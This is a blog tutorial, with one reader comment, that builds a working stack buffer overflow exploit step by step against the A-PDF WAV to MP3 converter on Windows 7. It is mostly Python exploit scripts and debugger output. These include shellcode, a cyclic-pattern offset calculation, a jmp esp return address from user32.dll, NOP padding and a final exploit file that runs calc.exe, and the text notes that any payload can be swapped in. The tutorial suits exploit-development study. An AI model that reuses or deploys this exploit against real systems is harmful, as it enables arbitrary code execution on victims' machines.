This article begins a small series of tutorials that aims to explain, step by step and in more detail than usual, how an exploit is built. The Internet is an inexhaustible source of knowledge and I want to add my own contribution.
Very often a published exploit for a vulnerability does not work as-is. That does not mean the vulnerability is absent, only that some small piece of the puzzle was not put back together correctly. The goal of this first tutorial is to understand, in simple steps, how these vulnerabilities work, so that we can adapt exploits to our needs and get them working.
Let’s start with this exploit, which triggers a buffer overflow (BOF) in A-PDF WAV to MP3, a tool that converts WAV files to MP3.
The exploit was tested on Windows XP Service Pack 3, so it does not work on a different platform such as Windows 7.
You can download the code below:
```python
#!/usr/bin/env python
#################################################################################
#
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes
# CMD=calc.exe
# Encoder - alpha/upper
# EXITFUNC - SEH
code = (
    "\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
    "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
    "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
    "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
    "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
    "\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
    "\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
    "\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
    "\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
    "\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
    "\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
    "\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
    "\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
    "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
    "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
    "\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
    "\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
    "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
    "\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
    "\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
    "\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
    "\x51\x42\x4c\x42\x43\x43\x30\x41\x41"
)

buff = "\x41" * 4132        # padding up to the SEH record
nops = "\x90" * 12          # NOP sled in front of the shellcode
nseh = "\xEB\x06\x90\x90"   # next SEH: short jump 6 bytes forward, over the handler address
retn = "\x5C\x26\x47\x00"   # SEH handler address, valid on XP SP3 only
junk = "\x42" * 300         # filler after the shellcode
sploit = buff + nseh + retn + nops + code + junk

# Python 2 script: str literals are raw bytes, so the file is written byte for byte.
try:
    f1 = open("Dr_IDEs.wav", "w")  # No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit)
    f1.close()
    print('[*] Success. Load File.')
except:
    print("[-] Error, could not write the file.")
```
As you can read in the header, the exploit should launch calc.exe, but on Windows 7 all we get is an application crash.
So how can this vulnerability be exploited on Windows 7?
This “simple” question is our way into understanding how the Windows stack works.
For now, what we need to know is that when a program is loaded into memory it is laid out in three segments:
- Code segment
- Data segment
- Stack segment
The stack segment pushes and pops frames, and the CPU keeps track of it with registers.
The most important ones are:
- ESP: pointer to the top of the stack
- EBP: pointer to the base of the current stack frame
- EIP: pointer to the next instruction to execute
I will not go into details that have already been widely covered on the Internet; a web search will fill any gaps left by this article.
Staying focused on our goal: there are many ways of redirecting execution to exploit a BOF. Looking at this exploit it is clear that it uses the SEH technique; in this tutorial, however, we will use a jmp esp.
First we verify that there really is a BOF and that EIP gets overwritten:
```python
#!/usr/bin/env python
# http://www.exploit-db.com/exploits/14681/
#################################################################################
#
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################
# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work

buff = "\x41" * 5000   # 5000 A's: enough to overflow the buffer and reach EIP
sploit = buff

try:
    f1 = open("Dr_IDEs2.wav", "w")  # No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit)
    f1.close()
    print('[*] Success. Load File.')
except:
    print("[-] Error, could not write the file.")
```
At this point we run the A-PDF application and attach OllyDbg to the process.
When we convert the newly created file, the application crashes and we can confirm that EIP has been overwritten with A’s (“\x41” in hexadecimal notation):
```
EAX 00000000
ECX 00001388
EDX 00001388
EBX 41414141
ESP 034DFE90 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141
```
So the BOF is real, but to use it we must calculate the offset, i.e. exactly which bytes of our input land in EIP. The Metasploit framework provides tools for this:
```
root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3A [. . .]
```
We create the pattern and copy the output directly into the exploit:
```python
#!/usr/bin/env python
# http://www.exploit-db.com/exploits/14681/
#################################################################################
#
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################
# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work

# Cyclic pattern from pattern_create.rb 5000 (truncated here as in the original;
# paste the full 5000-byte output).
buff = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab"
        "6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3A"
        "d4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1A"
        "f2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6A [ . . .]")
sploit = buff

try:
    f1 = open("Dr_IDEs3.wav", "w")  # No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit)
    f1.close()
    print('[*] Success. Load File.')
except:
    print("[-] Error, could not write the file.")
```
Again we check the value in EIP:
```
EAX 00000000
ECX 00001388
EDX 00001388
EBX 35684634
ESP 035DFE90 ASCII "h7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4F"
EBP 31684630
ESI 68463368
EDI 46326846
EIP 46366846
```
EIP contains 46366846. To calculate the offset we use another Metasploit tool, which takes as input the value just found and the length of the pattern that caused the BOF:
```
root@bt:/pentest/exploits/framework3/tools# ./pattern_offset.rb 46366846 5000
4128
```
Now we know exactly where to overwrite the EIP. We have a structure like this:
[ 4128 bytes BOF ] [ 4 bytes eip ] [ Other bytes where we can put the shellcode ]
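To see what pattern_create.rb and pattern_offset.rb do under the hood, here is an added example (my own code, not part of the original post or of Metasploit) that reimplements both in Python and reproduces the result above: the value 46366846 read from EIP sits at offset 4128 of a 5000-byte pattern, and the EBX value 35684634 sits four bytes earlier.

```python
import itertools
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def pattern_create(length):
    """Build the Metasploit-style cyclic pattern "Aa0Aa1Aa2..." of exactly `length` chars.

    Every 3-byte group (Upper, lower, digit) occurs once, so any 4 consecutive
    bytes identify a single position in the pattern; that is what lets us recover
    the offset from a register value after the crash.
    """
    if length > len(UPPER) * len(LOWER) * len(DIGIT) * 3:
        raise ValueError("pattern longer than one full cycle is no longer unique")
    groups = []
    for u, l, d in itertools.product(UPPER, LOWER, DIGIT):
        groups.append(u + l + d)
        if len(groups) * 3 >= length:
            break
    return "".join(groups)[:length]


def pattern_offset(value, length):
    """Return the offset of a 4-byte register value inside pattern_create(length).

    `value` is the dword as the debugger prints it (an int, or a hex string such
    as "46366846").  x86 is little-endian, so the bytes sit in memory in reverse
    order of the printed value; the big-endian reading is tried as a fallback.
    Returns None when the value does not come from the pattern at all (for
    example 0x41414141 from a plain "\\x41" * 5000 buffer).
    """
    if isinstance(value, str):
        value = int(value, 16)
    pattern = pattern_create(length)
    for fmt in ("<I", ">I"):
        needle = struct.pack(fmt, value & 0xFFFFFFFF).decode("latin-1")
        idx = pattern.find(needle)
        if idx != -1:
            return idx
    return None


if __name__ == "__main__":
    # Same inputs as in the post: a 5000-byte pattern, EIP = 46366846 at the crash.
    print(pattern_create(5000)[:60])
    print("EIP offset:", pattern_offset("46366846", 5000))   # 4128
    print("EBX offset:", pattern_offset("35684634", 5000))   # 4124
```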
Once EIP is overwritten and we control the flow of execution, there is another register that can point us straight to the shellcode: ESP, the top of the stack.
Let’s see exactly what happens:
```python
#!/usr/bin/env python
# http://www.exploit-db.com/exploits/14681/
#################################################################################
#
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################
# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work

buff = "\x41" * 4128        # A's up to the saved return address
eip = "\x42" * 4            # B's: the 4 bytes that land in EIP
shellcode = "\x43" * 200    # C's: marker bytes where the shellcode will go
sploit = buff + eip + shellcode

try:
    f1 = open("Dr_IDEs4.wav", "w")  # No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit)
    f1.close()
    print('[*] Success. Load File.')
except:
    print("[-] Error, could not write the file.")
```
In this script we caused the BOF with the character “\x41”, overwrote EIP with “\x42” and placed further bytes “\x43” after it. Looking at the registers we see that EIP has been overwritten as planned and that ESP points at the “\x43” (C) characters. Bingo!
```
EAX 00000000
ECX 000010EC
EDX 000010EC
EBX 41414141
ESP 035CFE90 ASCII 43,"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
EBP 41414141
ESI 41414141
EDI 41414141
EIP 42424242
```
Looking at the memory ESP points to, we can see that it has been filled with “\x43”:
```
035CFE90 43434343
035CFE94 43434343
035CFE98 43434343
035CFE9C 43434343
035CFEA0 43434343
035CFEA4 43434343
035CFEA8 43434343
035CFEAC 43434343
035CFEB0 43434343
035CFEB4 43434343
035CFEB8 43434343
035CFEBC 43434343
035CFEC0 43434343
035CFEC4 43434343
035CFEC8 43434343
035CFECC 43434343
```
Now we replace the “\x43” characters with a working shellcode and overwrite EIP with the address of a jmp esp instruction. When execution reaches that address it jumps straight to our shellcode. To find a jmp esp we look through the DLLs that the operating system and the program load at startup.
Pressing “E” in OllyDbg lists all the loaded modules (the executable and its DLLs):
We look for a jmp esp opcode in this DLL:
```
76BA0000 000C9000 76BBF7C9 user32 6.1.7600.16385 ( C:\Windows\system32\user32.dll
```
Double-click the DLL, then right-click and choose “Search for -> All commands -> jmp esp”:
```
Found commands
Address   Disassembly                           Comment
76BA1000  CMP DWORD PTR DS:[EDI+243276F8],ECX   (Initial CPU selection)
76BC6D53  JMP ESP
```
So 76BC6D53 is the address of a jmp esp inside user32.dll, written “\x53\x6d\xbc\x76” in little-endian byte order. However, to make the exploit as reliable as possible it is good practice to take the address from a DLL or EXE shipped with the program itself, such as “wavtomp3.exe”, rather than from a system DLL, whose addresses differ between Windows versions.
Now we can add shellcode to launch calc.exe:
```python
# http://www.exploit-db.com/exploits/14681/
#################################################################################
#
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################
# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work

buff = "\x41" * 4128
# 76bc6d53: jmp esp in user32.dll, little-endian
eip = "\x53\x6d\xbc\x76"
shellcode = (
    "\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4"
    "\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15"
    "\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3"
    "\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd"
    "\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99"
    "\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28"
    "\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa"
    "\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a"
    "\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7"
    "\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88"
    "\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a"
    "\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73"
    "\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02"
    "\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86"
    "\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60"
    "\xc8\x29\x9e"
)
sploit = buff + eip + shellcode

try:
    f1 = open("Dr_IDEs5.wav", "w")  # No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit)
    f1.close()
    print('[*] Success. Load File.')
except:
    print("[-] Error, could not write the file.")
```
Perfect, we are done! Or so you might think, but the exploit still does not work. Analysing the crash in OllyDbg we see that at the address now in EIP (which equals ESP after the jmp esp) the shellcode is intact only from its 17th byte onward; the first 16 bytes have been overwritten:
```
034CFE90  97 FE 4C 03 1B 00 DA 03
034CFE98  00 00 00 00 00 00 FF FF
034CFEA0  83 EB FC 31 43 0D 03 43
034CFEA8  5A 58 0D B7 8C 15 EE 48
034CFEB0  4C 46 66 AD 7D 54 1C A5
034CFEB8  2F 68 56 EB C3 03 3A 18
```
So we now need 16 NOPs (“\x90”) in front of the shellcode, shifting it by 16 bytes so that the overwritten region lands on the NOPs and the shellcode runs from its first byte:
```python
#!/usr/bin/env python
# http://www.exploit-db.com/exploits/14681/
#################################################################################
#
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################
# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work

buff = "\x41" * 4128
# 76bc6d53: jmp esp in user32.dll, little-endian
eip = "\x53\x6d\xbc\x76"
nops = "\x90" * 16   # absorb the 16 bytes at ESP that get overwritten before the jump
shellcode = (
    "\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4"
    "\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15"
    "\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3"
    "\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd"
    "\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99"
    "\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28"
    "\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa"
    "\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a"
    "\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7"
    "\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88"
    "\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a"
    "\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73"
    "\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02"
    "\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86"
    "\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60"
    "\xc8\x29\x9e"
)
sploit = buff + eip + nops + shellcode

try:
    f1 = open("Dr_IDEs6.wav", "w")  # No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit)
    f1.close()
    print('[*] Success. Load File.')
except:
    print("[-] Error, could not write the file.")
```
pwned!
Obviously, instead of calc.exe, any payload can be used, as shown in the video:
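To check the reading of the crash dump mechanically rather than by eye, here is an added example (my own code, not from the original post) that parses the OllyDbg hex dump at ESP and compares it with the shellcode to count how many leading bytes were overwritten. The dump rows and the first 48 shellcode bytes are copied from the post (the dump's ASCII column is dropped); the answer, 16, is what motivates the 16 NOPs.

```python
import re

# OllyDbg dump of the memory at ESP after the crash, copied from the post
# (ASCII column dropped; ESP was 0x034CFE90 at that moment).
OLLY_DUMP = """\
034CFE90 97 FE 4C 03 1B 00 DA 03
034CFE98 00 00 00 00 00 00 FF FF
034CFEA0 83 EB FC 31 43 0D 03 43
034CFEA8 5A 58 0D B7 8C 15 EE 48
034CFEB0 4C 46 66 AD 7D 54 1C A5
034CFEB8 2F 68 56 EB C3 03 3A 18
"""
ESP_AT_CRASH = 0x034CFE90

# First 48 bytes of the calc.exe shellcode used in the post (the part the dump covers).
SHELLCODE_HEAD = bytes.fromhex(
    "33c9b857baf84bdbdab133d97424f4"
    "5b83ebfc31430d03435a580db78c15"
    "ee484c4666ad7d541ca52f6856ebc3"
    "033a18"
)

DUMP_ROW = re.compile(r"^([0-9A-Fa-f]{8})((?:\s+[0-9A-Fa-f]{2}){1,16})")


def parse_olly_dump(text):
    """Turn 'ADDRESS xx xx xx ...' dump rows into (base_address, bytes).

    Rows that do not look like dump lines are skipped; rows must be contiguous.
    """
    base, data = None, bytearray()
    for line in text.splitlines():
        m = DUMP_ROW.match(line)
        if not m:
            continue
        addr = int(m.group(1), 16)
        if base is None:
            base = addr
        elif addr != base + len(data):
            raise ValueError("dump is not contiguous at %08X" % addr)
        data += bytes.fromhex("".join(m.group(2).split()))
    return base, bytes(data)


def clobbered_prefix(esp, base, dump, shellcode, min_match=8):
    """Count the leading shellcode bytes at ESP that were overwritten before the crash.

    The layout in the post puts the shellcode exactly at ESP, so dump[esp - base:]
    should equal the shellcode.  The first index k from which the two agree (for
    at least min_match bytes) is the number of bytes that were trampled, i.e. the
    NOP padding to put in front of the shellcode.  Returns None if nothing matches.
    """
    start = esp - base
    window = dump[start:start + len(shellcode)]
    n = min(len(window), len(shellcode))
    for k in range(0, n - min_match + 1):
        if window[k:n] == shellcode[k:n]:
            return k
    return None


if __name__ == "__main__":
    base, data = parse_olly_dump(OLLY_DUMP)
    k = clobbered_prefix(ESP_AT_CRASH, base, data, SHELLCODE_HEAD)
    print("shellcode intact from byte %d on -> pad with %d NOPs" % (k, k))   # 16, 16
```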
The first tutorial finishes here.
See you.
Michele `m7x` Manzotti
References: Corelan.
Great stuff!!! I’ll try this out in the lab. Keep up the work, many of us are inspired. Hopefully you’ll get around to doing a few to highlight differences in SEH vs ESP vs EIP exploits. I’m fuzzy there, sometimes because you aim to control EIP but when you crash, sometimes your output is not in EIP, it’s in SEH or some other place first, at the time of the access violation. How to proceed from there is not always so easy to know. I am clear on this part, jumping ahead and creating NOPs to properly align code that is upcoming in the memory dump, but what about if you need to jump backwards to get the code to line up? If you have a tutorial for that, I’m interested.